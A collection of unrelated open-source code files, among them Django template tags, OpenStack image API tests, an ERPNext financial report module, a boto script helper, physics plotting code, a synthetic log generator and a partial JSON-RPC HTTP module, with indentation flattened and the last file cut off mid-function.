# This check is kept for backwards-compatibility. See #3100.
endblock = parser.next_token()
acceptable_endblocks = ('endblock', 'endblock %s' % block_name)
if endblock.contents not in acceptable_endblocks:
parser.invalid_block_tag(endblock, 'endblock', acceptable_endblocks)
return BlockNode(block_name, nodelist)
@register.tag('extends')
def do_extends(parser, token):
"""
Signal that this template extends a parent template.
This tag may be used in two ways: ``{% extends "base" %}`` (with quotes)
uses the literal value "base" as the name of the parent template to extend,
or ``{% extends variable %}`` uses the value of ``variable`` as either the
name of the parent template to extend (if it evaluates to a string) or as
the parent template itself (if it evaluates to a Template object).
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' takes one argument" % bits[0])
parent_name = parser.compile_filter(bits[1])
nodelist = parser.parse()
if nodelist.get_nodes_by_type(ExtendsNode):
raise TemplateSyntaxError("'%s' cannot appear more than once in the same template" % bits[0])
return ExtendsNode(nodelist, parent_name)
@register.tag('include')
def do_include(parser, token):
"""
Loads a template and renders it with the current context. You can pass
additional context using keyword arguments.
Example::
{% include "foo/some_include" %}
{% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
Use the ``only`` argument to exclude the current context when rendering
the included template::
{% include "foo/some_include" only %}
{% include "foo/some_include" with bar="1" only %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError(
"%r tag takes at least one argument: the name of the template to "
"be included." % bits[0]
)
options = {}
remaining_bits = bits[2:]
while remaining_bits:
option = remaining_bits.pop(0)
if option in options:
raise TemplateSyntaxError('The %r option was specified more '
'than once.' % option)
if option == 'with':
value = token_kwargs(remaining_bits, parser, support_legacy=False)
if not value:
raise TemplateSyntaxError('"with" in %r tag needs at least '
'one keyword argument.' % bits[0])
elif option == 'only':
value = True
else:
raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
(bits[0], option))
options[option] = value
isolated_context = options.get('only', False)
namemap = options.get('with', {})
return IncludeNode(parser.compile_filter(bits[1]), extra_context=namemap,
isolated_context=isolated_context)
|
bsd-3-clause
|
JioCloud/tempest
|
tempest/api/image/v2/test_images.py
|
6
|
10418
|
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from six import moves
from tempest_lib.common.utils import data_utils
from tempest_lib import decorators
from tempest.api.image import base
from tempest import test
class BasicOperationsImagesTest(base.BaseV2ImageTest):
"""
Here we test the basic operations of images
"""
@decorators.skip_because(bug="1452987")
@test.attr(type='smoke')
@test.idempotent_id('139b765e-7f3d-4b3d-8b37-3ca3876ee318')
def test_register_upload_get_image_file(self):
"""
Here we test these functionalities - Register image,
upload the image file, get image and get image file api's
"""
uuid = '00000000-1111-2222-3333-444455556666'
image_name = data_utils.rand_name('image')
body = self.create_image(name=image_name,
container_format='bare',
disk_format='raw',
visibility='private',
ramdisk_id=uuid)
self.assertIn('id', body)
image_id = body.get('id')
self.assertIn('name', body)
self.assertEqual(image_name, body['name'])
self.assertIn('visibility', body)
self.assertEqual('private', body['visibility'])
self.assertIn('status', body)
self.assertEqual('queued', body['status'])
# Now try uploading an image file
file_content = data_utils.random_bytes()
image_file = moves.cStringIO(file_content)
self.client.store_image_file(image_id, image_file)
# Now try to get image details
body = self.client.show_image(image_id)
self.assertEqual(image_id, body['id'])
self.assertEqual(image_name, body['name'])
self.assertEqual(uuid, body['ramdisk_id'])
self.assertIn('size', body)
self.assertEqual(1024, body.get('size'))
# Now try get image file
body = self.client.load_image_file(image_id)
self.assertEqual(file_content, body.data)
@test.attr(type='smoke')
@test.idempotent_id('f848bb94-1c6e-45a4-8726-39e3a5b23535')
def test_delete_image(self):
# Deletes an image by image_id
# Create image
image_name = data_utils.rand_name('image')
body = self.client.create_image(name=image_name,
container_format='bare',
disk_format='raw',
visibility='private')
image_id = body['id']
# Delete Image
self.client.delete_image(image_id)
self.client.wait_for_resource_deletion(image_id)
# Verifying deletion
images = self.client.list_images()
images_id = [item['id'] for item in images]
self.assertNotIn(image_id, images_id)
@decorators.skip_because(bug="1452987")
@test.attr(type='smoke')
@test.idempotent_id('f66891a7-a35c-41a8-b590-a065c2a1caa6')
def test_update_image(self):
# Updates an image by image_id
# Create image
image_name = data_utils.rand_name('image')
body = self.client.create_image(name=image_name,
container_format='bare',
disk_format='iso',
visibility='private')
self.addCleanup(self.client.delete_image, body['id'])
self.assertEqual('queued', body['status'])
image_id = body['id']
# Now try uploading an image file
image_file = moves.cStringIO(data_utils.random_bytes())
self.client.store_image_file(image_id, image_file)
# Update Image
new_image_name = data_utils.rand_name('new-image')
body = self.client.update_image(image_id, [
dict(replace='/name', value=new_image_name)])
# Verifying updating
body = self.client.show_image(image_id)
self.assertEqual(image_id, body['id'])
self.assertEqual(new_image_name, body['name'])
class ListImagesTest(base.BaseV2ImageTest):
"""
Here we test the listing of image information
"""
@classmethod
def resource_setup(cls):
super(ListImagesTest, cls).resource_setup()
# We add a few images here to test the listing functionality of
# the images API
cls._create_standard_image('bare', 'raw')
cls._create_standard_image('bare', 'raw')
cls._create_standard_image('ami', 'raw')
# Add some more for listing
cls._create_standard_image('ami', 'ami')
cls._create_standard_image('ari', 'ari')
cls._create_standard_image('aki', 'aki')
@classmethod
def _create_standard_image(cls, container_format, disk_format):
"""
Create a new standard image and return the ID of the newly-registered
image. Note that the size of the new image is a random number between
1024 and 4096
"""
size = random.randint(1024, 4096)
image_file = moves.cStringIO(data_utils.random_bytes(size))
name = data_utils.rand_name('image')
body = cls.create_image(name=name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
image_id = body['id']
# cls.client.store_image(image_id, data=image_file)
return image_id
def _list_by_param_value_and_assert(self, params):
"""
Perform list action with given params and validates result.
"""
images_list = self.client.list_images(params=params)
# Validating params of fetched images
for image in images_list:
for key in params:
msg = "Failed to list images by %s" % key
self.assertEqual(params[key], image[key], msg)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('1e341d7a-90a9-494c-b143-2cdf2aeb6aee')
def test_index_no_params(self):
# Simple test to see all fixture images returned
images_list = self.client.list_images()
image_list = map(lambda x: x['id'], images_list)
for image in self.created_images:
self.assertIn(image, image_list)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('9959ca1d-1aa7-4b7a-a1ea-0fff0499b37e')
def test_list_images_param_container_format(self):
# Test to get all images with container_format='bare'
params = {"container_format": "bare"}
self._list_by_param_value_and_assert(params)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('4a4735a7-f22f-49b6-b0d9-66e1ef7453eb')
def test_list_images_param_disk_format(self):
# Test to get all images with disk_format = raw
params = {"disk_format": "raw"}
self._list_by_param_value_and_assert(params)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('7a95bb92-d99e-4b12-9718-7bc6ab73e6d2')
def test_list_images_param_visibility(self):
# Test to get all images with visibility = private
params = {"visibility": "private"}
self._list_by_param_value_and_assert(params)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('cf1b9a48-8340-480e-af7b-fe7e17690876')
def test_list_images_param_size(self):
# Test to get all images by size
image_id = self.created_images[1]
# Get image metadata
image = self.client.show_image(image_id)
params = {"size": image['size']}
self._list_by_param_value_and_assert(params)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('4ad8c157-971a-4ba8-aa84-ed61154b1e7f')
def test_list_images_param_min_max_size(self):
# Test to get all images with size between 2000 to 3000
image_id = self.created_images[1]
# Get image metadata
image = self.client.show_image(image_id)
size = image['size']
params = {"size_min": size - 500, "size_max": size + 500}
images_list = self.client.list_images(params=params)
image_size_list = map(lambda x: x['size'], images_list)
for image_size in image_size_list:
self.assertTrue(image_size >= params['size_min'] and
image_size <= params['size_max'],
"Failed to get images by size_min and size_max")
@decorators.skip_because(bug="1452987")
@test.idempotent_id('7fc9e369-0f58-4d05-9aa5-0969e2d59d15')
def test_list_images_param_status(self):
# Test to get all active images
params = {"status": "active"}
self._list_by_param_value_and_assert(params)
@decorators.skip_because(bug="1452987")
@test.idempotent_id('e914a891-3cc8-4b40-ad32-e0a39ffbddbb')
def test_list_images_param_limit(self):
# Test to get images by limit
params = {"limit": 2}
images_list = self.client.list_images(params=params)
self.assertEqual(len(images_list), params['limit'],
"Failed to get images by limit")
@decorators.skip_because(bug="1452987")
@test.idempotent_id('622b925c-479f-4736-860d-adeaf13bc371')
def test_get_image_schema(self):
# Test to get image schema
schema = "image"
body = self.client.show_schema(schema)
self.assertEqual("image", body['name'])
@decorators.skip_because(bug="1452987")
@test.idempotent_id('25c8d7b2-df21-460f-87ac-93130bcdc684')
def test_get_images_schema(self):
# Test to get images schema
schema = "images"
body = self.client.show_schema(schema)
self.assertEqual("images", body['name'])
|
apache-2.0
|
mlundblad/telepathy-gabble
|
tests/twisted/vcard/disconnect-during-pep.py
|
2
|
1199
|
"""
Regression test for https://bugs.freedesktop.org/show_bug.cgi?id=31412
"""
import dbus
from servicetest import call_async, EventPattern, sync_dbus
from gabbletest import (exec_test, make_result_iq, acknowledge_iq,
disconnect_conn)
import constants as cs
def test(q, bus, conn, stream):
event = q.expect('stream-iq', to=None, query_ns='vcard-temp',
query_name='vCard')
acknowledge_iq(stream, event.stanza)
handle = conn.RequestHandles(cs.HT_CONTACT, ['[email protected]'])[0]
call_async(q, conn.Aliasing, 'RequestAliases', [handle])
# First, Gabble sends a PEP query
event = q.expect('stream-iq', to='[email protected]', iq_type='get',
query_ns='http://jabber.org/protocol/pubsub', query_name='pubsub')
# We disconnect too soon to get a reply
disconnect_conn(q, conn, stream)
# fd.o #31412 was that while the request pipeline was shutting down,
# it would give the PEP query an error; the aliasing code would
# respond by falling back to vCard via the request pipeline, which
# was no longer there, *crash*.
# check that Gabble hasn't crashed
sync_dbus(bus, q, conn)
if __name__ == '__main__':
exec_test(test)
|
lgpl-2.1
|
indictranstech/fbd_erpnext
|
erpnext/accounts/report/financial_statements.py
|
1
|
7760
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, _dict
from frappe.utils import (flt, getdate, get_first_day, get_last_day,
add_months, add_days, formatdate)
def get_period_list(fiscal_year, periodicity, from_beginning=False):
"""Get a list of dict {"to_date": to_date, "key": key, "label": label}
Periodicity can be (Yearly, Quarterly, Monthly)"""
fy_start_end_date = frappe.db.get_value("Fiscal Year", fiscal_year, ["year_start_date", "year_end_date"])
if not fy_start_end_date:
frappe.throw(_("Fiscal Year {0} not found.").format(fiscal_year))
start_date = getdate(fy_start_end_date[0])
end_date = getdate(fy_start_end_date[1])
if periodicity == "Yearly":
period_list = [_dict({"to_date": end_date, "key": fiscal_year, "label": fiscal_year})]
else:
months_to_add = {
"Half-yearly": 6,
"Quarterly": 3,
"Monthly": 1
}[periodicity]
period_list = []
# start with first day, so as to avoid year to_dates like 2-April if ever they occur
to_date = get_first_day(start_date)
for i in xrange(12 / months_to_add):
to_date = add_months(to_date, months_to_add)
if to_date == get_first_day(to_date):
# if to_date is the first day, get the last day of previous month
to_date = add_days(to_date, -1)
else:
# to_date should be the last day of the new to_date's month
to_date = get_last_day(to_date)
if to_date <= end_date:
# the normal case
period_list.append(_dict({ "to_date": to_date }))
# if it ends before a full year
if to_date == end_date:
break
else:
# if a fiscal year ends before a 12 month period
period_list.append(_dict({ "to_date": end_date }))
break
# common processing
for opts in period_list:
key = opts["to_date"].strftime("%b_%Y").lower()
label = formatdate(opts["to_date"], "MMM YYYY")
opts.update({
"key": key.replace(" ", "_").replace("-", "_"),
"label": label,
"year_start_date": start_date,
"year_end_date": end_date
})
if from_beginning:
# set start date as None for all fiscal periods, used in case of Balance Sheet
opts["from_date"] = None
else:
opts["from_date"] = start_date
return period_list
def get_data(company, root_type, balance_must_be, period_list, ignore_closing_entries=False):
accounts = get_accounts(company, root_type)
if not accounts:
return None
accounts, accounts_by_name = filter_accounts(accounts)
gl_entries_by_account = get_gl_entries(company, period_list[0]["from_date"], period_list[-1]["to_date"],
accounts[0].lft, accounts[0].rgt, ignore_closing_entries=ignore_closing_entries)
calculate_values(accounts_by_name, gl_entries_by_account, period_list)
accumulate_values_into_parents(accounts, accounts_by_name, period_list)
out = prepare_data(accounts, balance_must_be, period_list)
if out:
add_total_row(out, balance_must_be, period_list)
return out
def calculate_values(accounts_by_name, gl_entries_by_account, period_list):
for entries in gl_entries_by_account.values():
for entry in entries:
d = accounts_by_name.get(entry.account)
for period in period_list:
# check if posting date is within the period
if entry.posting_date <= period.to_date:
d[period.key] = d.get(period.key, 0.0) + flt(entry.debit) - flt(entry.credit)
def accumulate_values_into_parents(accounts, accounts_by_name, period_list):
"""accumulate children's values in parent accounts"""
for d in reversed(accounts):
if d.parent_account:
for period in period_list:
accounts_by_name[d.parent_account][period.key] = accounts_by_name[d.parent_account].get(period.key, 0.0) + \
d.get(period.key, 0.0)
def prepare_data(accounts, balance_must_be, period_list):
out = []
year_start_date = period_list[0]["year_start_date"].strftime("%Y-%m-%d")
year_end_date = period_list[-1]["year_end_date"].strftime("%Y-%m-%d")
for d in accounts:
# add to output
has_value = False
row = {
"account_name": d.account_name,
"account": d.name,
"parent_account": d.parent_account,
"indent": flt(d.indent),
"from_date": year_start_date,
"to_date": year_end_date
}
for period in period_list:
if d.get(period.key):
# change sign based on Debit or Credit, since calculation is done using (debit - credit)
d[period.key] *= (1 if balance_must_be=="Debit" else -1)
row[period.key] = flt(d.get(period.key, 0.0), 3)
if abs(row[period.key]) >= 0.005:
# ignore zero values
has_value = True
if has_value:
out.append(row)
return out
def add_total_row(out, balance_must_be, period_list):
row = {
"account_name": "'" + _("Total ({0})").format(balance_must_be) + "'",
"account": None
}
for period in period_list:
row[period.key] = out[0].get(period.key, 0.0)
out[0][period.key] = ""
out.append(row)
# blank row after Total
out.append({})
def get_accounts(company, root_type):
return frappe.db.sql("""select name, parent_account, lft, rgt, root_type, report_type, account_name from `tabAccount`
where company=%s and root_type=%s order by lft""", (company, root_type), as_dict=True)
def filter_accounts(accounts, depth=10):
parent_children_map = {}
accounts_by_name = {}
for d in accounts:
accounts_by_name[d.name] = d
parent_children_map.setdefault(d.parent_account or None, []).append(d)
filtered_accounts = []
def add_to_list(parent, level):
if level < depth:
children = parent_children_map.get(parent) or []
if parent == None:
sort_root_accounts(children)
for child in children:
child.indent = level
filtered_accounts.append(child)
add_to_list(child.name, level + 1)
add_to_list(None, 0)
return filtered_accounts, accounts_by_name
def sort_root_accounts(roots):
"""Sort root types as Asset, Liability, Equity, Income, Expense"""
def compare_roots(a, b):
if a.report_type != b.report_type and a.report_type == "Balance Sheet":
return -1
if a.root_type != b.root_type and a.root_type == "Asset":
return -1
if a.root_type == "Liability" and b.root_type == "Equity":
return -1
if a.root_type == "Income" and b.root_type == "Expense":
return -1
return 1
roots.sort(compare_roots)
def get_gl_entries(company, from_date, to_date, root_lft, root_rgt, ignore_closing_entries=False):
"""Returns a dict like { "account": [gl entries], ... }"""
additional_conditions = []
# if cost_center:
# additional_conditions.append("and cost_center = %(cost_center)s")
if ignore_closing_entries:
additional_conditions.append("and ifnull(voucher_type, '')!='Period Closing Voucher'")
if from_date:
additional_conditions.append("and posting_date >= %(from_date)s")
gl_entries = frappe.db.sql("""select posting_date, account, debit, credit, is_opening from `tabGL Entry`
where company=%(company)s
{additional_conditions}
and posting_date <= %(to_date)s
and account in (select name from `tabAccount`
where lft >= %(lft)s and rgt <= %(rgt)s)
order by account, posting_date""".format(additional_conditions="\n".join(additional_conditions)),
{
"company": company,
"from_date": from_date,
"to_date": to_date,
"lft": root_lft,
"rgt": root_rgt
},
as_dict=True)
gl_entries_by_account = {}
for entry in gl_entries:
gl_entries_by_account.setdefault(entry.account, []).append(entry)
return gl_entries_by_account
def get_columns(period_list):
columns = [{
"fieldname": "account",
"label": _("Account"),
"fieldtype": "Link",
"options": "Account",
"width": 300
}]
for period in period_list:
columns.append({
"fieldname": period.key,
"label": period.label,
"fieldtype": "Currency",
"width": 150
})
return columns
|
agpl-3.0
|
bmotlaghFLT/FLT_PhantomJS
|
src/breakpad/src/tools/gyp/test/generator-output/gyptest-copies.py
|
151
|
1694
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies file copies using an explicit build target of 'all'.
"""
import TestGyp
test = TestGyp.TestGyp()
test.writable(test.workpath('copies'), False)
test.run_gyp('copies.gyp',
'--generator-output=' + test.workpath('gypfiles'),
chdir='copies')
test.writable(test.workpath('copies'), True)
test.relocate('copies', 'relocate/copies')
test.relocate('gypfiles', 'relocate/gypfiles')
test.writable(test.workpath('relocate/copies'), False)
test.writable(test.workpath('relocate/copies/build'), True)
test.writable(test.workpath('relocate/copies/copies-out'), True)
test.writable(test.workpath('relocate/copies/subdir/build'), True)
test.writable(test.workpath('relocate/copies/subdir/copies-out'), True)
test.build('copies.gyp', test.ALL, chdir='relocate/gypfiles')
test.must_match(['relocate', 'copies', 'copies-out', 'file1'],
"file1 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file2'], "file2 contents\n")
test.must_match(['relocate', 'copies', 'subdir', 'copies-out', 'file3'],
"file3 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/subdir/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file4'], "file4 contents\n")
test.pass_test()
|
bsd-3-clause
|
Shouqun/node-gn
|
tools/depot_tools/third_party/boto/pyami/scriptbase.py
|
90
|
1422
|
import os
import sys
from boto.utils import ShellCommand, get_ts
import boto
import boto.utils
class ScriptBase:
def __init__(self, config_file=None):
self.instance_id = boto.config.get('Instance', 'instance-id', 'default')
self.name = self.__class__.__name__
self.ts = get_ts()
if config_file:
boto.config.read(config_file)
def notify(self, subject, body=''):
boto.utils.notify(subject, body)
def mkdir(self, path):
if not os.path.isdir(path):
try:
os.mkdir(path)
except:
boto.log.error('Error creating directory: %s' % path)
def umount(self, path):
if os.path.ismount(path):
self.run('umount %s' % path)
def run(self, command, notify=True, exit_on_error=False, cwd=None):
self.last_command = ShellCommand(command, cwd=cwd)
if self.last_command.status != 0:
boto.log.error('Error running command: "%s". Output: "%s"' % (command, self.last_command.output))
if notify:
self.notify('Error encountered', \
'Error running the following command:\n\t%s\n\nCommand output:\n\t%s' % \
(command, self.last_command.output))
if exit_on_error:
sys.exit(-1)
return self.last_command.status
def main(self):
pass
|
mit
|
dlodato/AliPhysics
|
PWGJE/EMCALJetTasks/Tracks/analysis/Draw/DrawClusters.py
|
41
|
5445
|
#**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.FileHandler import ResultDataBuilder
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import FourPanelPlot,GraphicsObject,Style,Frame
from ROOT import kBlack,kBlue,kGreen,kRed,kOrange
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Helper import MakeRatio,HistToGraph
class ClusterComparisonPlot(FourPanelPlot):
def __init__(self, comparisonCalib, comparisonUncalib):
FourPanelPlot.__init__(self)
self.__comparisonCalib = comparisonCalib
self.__comparisonUncalib = comparisonUncalib
def Create(self):
self._OpenCanvas("clusterComparison", "Comparison of the cluster energy spectrum for different triggers")
spectrumFrame = Frame("specfram", 0., 100., 1e-10, 100)
spectrumFrame.SetXtitle("E (GeV)")
spectrumFrame.SetYtitle("1/N_{ev} 1/(#Delta E) dN/dE (1/(GeV/c)^{2})")
ratioFrame = Frame("ratioframe", 0., 100., 0., 2000.)
ratioFrame.SetXtitle("E (GeV)")
ratioFrame.SetYtitle("Triggered / Min. Bias")
frames = [spectrumFrame, ratioFrame]
comparisonObjects = [self.__comparisonCalib, self.__comparisonUncalib]
modes = ["Calibrated clusters", "UncalibratedClusters"]
for row in range(0,2):
for col in range(0,2):
pad = self._OpenPadByRowCol(row, col)
pad.DrawFrame(frames[col])
doRatio = False
if col == 1:
doRatio = True
else:
pad.GetPad().SetLogy(True)
pad.DrawLabel(0.15, 0.15, 0.65, 0.22, modes[row])
if col == 0:
pad.DrawGraphicsObject(comparisonObjects[row].GetGraphicsInRange("MinBias", False), True, "Min. Bias")
for t in ["EMCJHigh", "EMCJLow", "EMCGHigh", "EMCGLow"]:
pad.DrawGraphicsObject(comparisonObjects[row].GetGraphicsInRange(t, doRatio), True, t)
if row == 0 and col == 0:
pad.CreateLegend(0.5, 0.65, 0.89, 0.89)
self._canvas.cd()
class ClusterComparison:
def __init__(self, mytype, minbias, triggered):
self.__minBias = minbias
self.__triggered = triggered
self.__ratios = self.__CalculateRatios()
def GetGraphicsInRange(self, trigger, isRatio = False):
graphics = None
styles = {"MinBias":Style(kBlack, 20), "EMCJHigh":Style(kBlue, 24), "EMCJLow":Style(kRed, 26), "EMCGHigh":Style(kGreen,25), "EMCGLow":Style(kOrange,27)}
if trigger is "MinBias":
graphics = GraphicsObject(HistToGraph(self.__minBias, 0.1, 100.), styles["MinBias"])
else:
mydict = self.__triggered
if isRatio:
mydict = self.__ratios
graphics = GraphicsObject(HistToGraph(mydict[trigger], 0.1, 100.), styles[trigger])
return graphics
def __CalculateRatios(self):
ratios = {}
for trg in self.__triggered.keys():
ratios[trg] = MakeRatio(self.__triggered[trg], self.__minBias)
return ratios
def MakeClusterEnergySpectrum(data, trigger):
cont = data.GetData(trigger)
cont.SetVertexRange(-10, 10)
cont.SetPileupRejection(True)
result = {"Calib": cont.MakeClusterProjection(0, "Calib", "ClustECalib%s" %(trigger)), "Uncalib":cont.MakeClusterProjection(0, "Uncalib", "ClustEUncalib%s" %(trigger))}
cont.Reset()
return result
def DrawClusters(fileformat = "lego"):
readerDE = ResultDataBuilder(fileformat, "merged_DE/AnalysisResults.root")
dataDE = readerDE.GetResults()
dataDE.SetName("LHC13de")
readerC = ResultDataBuilder(fileformat, "LHC13c/AnalysisResults.root")
dataC = readerC.GetResults()
dataC.SetName("LHC13c")
clustersCalibTRG = {}
clustersUncalibTRG = {}
clustersMB = MakeClusterEnergySpectrum(dataC, "MinBias")
for t in ["EMCJHigh", "EMCJLow", "EMCGHigh", "EMCGLow"]:
res = MakeClusterEnergySpectrum(dataDE, t)
clustersCalibTRG[t] = res["Calib"]
clustersUncalibTRG[t] = res["Uncalib"]
plot = ClusterComparisonPlot(ClusterComparison("Calib", clustersMB["Calib"], clustersCalibTRG), ClusterComparison("Uncalib", clustersMB["Uncalib"], clustersUncalibTRG))
plot.Create()
return plot
|
bsd-3-clause
|
JennyChi/Script-helper
|
BAT/nonclustering/DC/size_simple_event.py
|
3
|
1771
|
## file_simple_event.py
# Author: Chen-Ning (Jenny) Chi
# Date: 2011 Sep
###########################################################
## The program will generate & input simple event.
# Support files & directory.
# Could specify the new file to create the specified size events.
# Could specify how many events are going to be input.
# Could specify the inputting frequency.
###########################################################
HELP_MESSAGE = """
-help : Print out possible parameters
-d [string] : the data which we want to add new event. Default: test.log
-s [int] : size of events. Default: 1MB
"""
import sys, time, string, random
## Default settings
data = "test.log"
volume = pow(10, 6) * 3
## Reading parameters
for cnt in range(len(sys.argv)):
if string.find(sys.argv[cnt], "-h") == 0:
print HELP_MESSAGE
sys.exit(0)
if string.find(sys.argv[cnt], "-d") == 0:
data = str(sys.argv[cnt+1])
if string.find(sys.argv[cnt], "-s") == 0:
volume = int(sys.argv[cnt+1])
print "Input data to "+data
print "Total size of events: "+str(volume)
counter = 0
size = 0
while size < volume:
counter = counter + 1
input_message = ""
input_message = "line " + str(counter) + " "
input_message = input_message + time.asctime(time.localtime()) + " "
input_message = input_message + "counter=" + str(counter) + ", "
input_message = input_message + "state=" + str(random.randrange(0, 9, 1)) + ", "
input_message = input_message + "ip=140.116." + str(random.randrange(0, 255, 1)) + "." + str(random.randrange(0, 255, 1)) + "\n"
file_out = open(data, 'a')
file_out.write(input_message)
file_out.close()
size = size + len(input_message)
print "Number of events: " +str(counter)+ ", total size: " +str(size)
|
apache-2.0
|
moritz-wundke/Concurrent
|
concurrent/core/transport/pyjsonrpc/http.py
|
1
|
8216
|
#!/usr/bin/env python
# coding: utf-8
import sys
import urllib2
import base64
import BaseHTTPServer
import SocketServer
import httplib
import urllib
import urlparse
from StringIO import StringIO
import gzip
import rpcrequest
import rpcresponse
import rpcerror
import rpclib
from rpcjson import json
def http_request(url, json_string, username = None, password = None):
"""
Fetch data from webserver (POST request)
:param json_string: JSON-String
:param username: If *username* is given, BASE authentication will be used.
"""
request = urllib2.Request(url, data = json_string)
request.add_header("Content-Type", "application/json")
request.add_header("Content-Length", len(json_string))
if username:
base64string = base64.encodestring('%s:%s' % (username, password))[:-1]
request.add_header("Authorization", "Basic %s" % base64string)
# enable gzip content
request.add_header('Accept-encoding', 'gzip')
response = urllib2.urlopen(request)
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO( response.read() )
f = gzip.GzipFile(fileobj=buf)
response_string = f.read()
else:
response_string = response.read()
response.close()
return response_string
class HttpClient(object):
class _Method(object):
def __init__(self, http_client_instance, method):
self.http_client_instance = http_client_instance
self.method = method
def __call__(self, *args, **kwargs):
return self.http_client_instance.call(self.method, *args, **kwargs)
def __init__(
self,
url,
username = None,
password = None
):
"""
:param: URL to the JSON-RPC handler on the HTTP-Server.
Example: ``"https://example.com/jsonrpc"``
:param username: If *username* is given, BASE authentication will be used.
:param password: Password for BASE authentication.
"""
self.url = url
self.username = username
self.password = password
def call(self, method, *args, **kwargs):
"""
Creates the JSON-RPC request string, calls the HTTP server, converts
JSON-RPC response string to python and returns the result.
:param method: Name of the method which will be called on the HTTP server.
Or a list with RPC-Request-Dictionaries. Syntax::
"<MethodName>" or [<JsonRpcRequestDict>, ...]
RPC-Request-Dictionaries will be made with the function
*rpcrequest.create_request_dict()*.
"""
# Create JSON-RPC-request
if isinstance(method, basestring):
request_json = rpcrequest.create_request_json(method, *args, **kwargs)
else:
request_json = json.dumps(method)
assert not args and not kwargs
# Call the HTTP-JSON-RPC server
response_json = http_request(
url = self.url,
json_string = request_json,
username = self.username,
password = self.password
)
# Convert JSON-RPC-response to python-object
response = rpcresponse.parse_response_json(response_json)
if response.error:
# Raise error
raise rpcerror.jsonrpcerrors[response.error.code](
message = response.error.message,
data = response.error.data
)
else:
# Return result
return response.result
def __call__(self, method, *args, **kwargs):
"""
Redirects the direct call to *self.call*
"""
return self.call(method, *args, **kwargs)
def __getattr__(self, method):
"""
Allows the usage of attributes as *method* names.
"""
return self._Method(http_client_instance = self, method = method)
class ThreadingHttpServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""
Threading HTTP Server
"""
pass
class HttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler, rpclib.JsonRpc):
"""
HttpRequestHandler for JSON-RPC-Requests
Info: http://www.simple-is-better.org/json-rpc/transport_http.html
"""
protocol_version = "HTTP/1.1"
#server_version = "BaseHTTP/" + __version__
def set_content_type_json(self):
"""
Set content-type to "application/json"
"""
self.send_header("Content-Type", "application/json")
def set_no_cache(self):
"""
Disable caching
"""
self.send_header("Cache-Control", "no-cache")
self.send_header("Pragma", "no-cache")
def set_content_length(self, length):
"""
Set content-length-header
"""
self.send_header("Content-Length", str(length))
def do_GET(self):
"""
Handles HTTP-GET-Request
"""
# Parse URL query
query = urlparse.parse_qs(urllib.splitquery(self.path)[1])
# jsonrpc
jsonrpc = query.get("jsonrpc")
if jsonrpc:
jsonrpc = jsonrpc[0]
# id
id = query.get("id")
if id:
id = id[0]
# method
method = query.get("method")
if method:
method = method[0]
# params
args = []
kwargs = {}
params = query.get("params")
if params:
params = json.loads(params[0])
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON reqeust string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
def do_POST(self):
"""
Handles HTTP-POST-Request
"""
# Read JSON request
content_length = int(self.headers.get("Content-Length", 0))
request_json = self.rfile.read(content_length)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
return
def handle_cgi_request(methods = None):
"""
Gets the JSON-RPC request from CGI environment and returns the
result to STDOUT
"""
import cgi
import cgitb
cgitb.enable()
# get response-body
request_json = sys.stdin.read()
if request_json:
# POST
request_json = urlparse.unquote(request_json)
else:
# GET
args = []
kwargs = {}
fields = cgi.FieldStorage()
